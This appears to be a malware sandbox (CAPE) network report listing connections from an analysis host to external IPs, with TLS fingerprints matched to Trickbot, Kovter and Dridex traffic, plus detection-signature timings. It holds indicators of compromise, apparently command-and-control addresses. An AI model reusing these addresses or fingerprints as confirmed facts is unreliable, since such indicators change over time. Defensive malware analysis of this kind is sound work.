10.7.21.101 49447 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49448 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49450 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49451 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49452 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49453 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49455 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49456 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49457 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49458 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49467 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49468 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49469 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49470 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49472 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49473 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49474 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49481 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49484 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49485 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49486 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49487 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49489 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49490 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49491 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49515 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49574 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49575 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49576 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49577 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49586 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49220 130.255.61.214 9001 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49205 172.104.137.234 443 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49207 172.104.137.234 443 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49218 172.104.137.234 443 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49221 172.104.137.234 443 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49200 185.41.154.130 9001 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49208 185.41.154.130 9001 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49219 185.41.154.130 9001 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49222 185.41.154.130 9001 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49217 195.176.3.23 443 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49212 203.59.20.119 9001 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49204 37.233.102.65 443 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49223 40.69.62.87 443 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49209 5.39.217.14 443 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49215 54.172.29.192 9001 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49210 64.137.236.236 9001 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49213 64.137.236.236 9001 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49224 78.47.14.4 443 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49201 82.118.17.235 443 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49225 82.146.46.184 447 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49229 82.146.61.102 447 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49265 82.146.61.102 447 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49203 83.163.164.15 9003 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49211 84.40.112.70 9001 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49216 84.40.112.70 9001 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49202 88.99.162.199 9001 fb00055a1196aeea8d1bc609885ba953 unknown
10.7.21.101 49198 92.38.135.168 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49227 92.38.135.168 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Comments



No comments posted

Processing ( 8.264 seconds )

  • 8.25 NetworkAnalysis
  • 0.01 AnalysisInfo
  • 0.002 BehaviorAnalysis
  • 0.002 Debug

Signatures ( 0.059 seconds )

  • 0.007 antiav_detectreg
  • 0.006 infostealer_ftp
  • 0.004 antiav_detectfile
  • 0.004 ransomware_files
  • 0.003 persistence_autorun
  • 0.003 antianalysis_detectfile
  • 0.003 antianalysis_detectreg
  • 0.003 browser_security
  • 0.003 disables_browser_warn
  • 0.003 infostealer_bitcoin
  • 0.003 ransomware_extensions
  • 0.002 cerber_behavior
  • 0.002 infostealer_im
  • 0.001 tinba_behavior
  • 0.001 rat_nanocore
  • 0.001 ursnif_behavior
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_addon
  • 0.001 disables_system_restore
  • 0.001 infostealer_mail
  • 0.001 ie_martian_children
  • 0.001 network_torgateway

Reporting ( 0.0 seconds )

Task ID 34867
Mongo ID 5c5854b1f284884f6aa788f8
Cuckoo release 1.3-CAPE
Delete